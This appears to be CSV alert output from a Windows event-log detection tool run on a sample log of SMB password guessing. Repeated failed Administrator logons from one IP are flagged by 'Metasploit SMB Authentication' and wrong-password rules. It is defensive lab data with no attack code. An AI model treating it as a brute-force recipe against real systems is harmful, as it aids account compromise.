2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
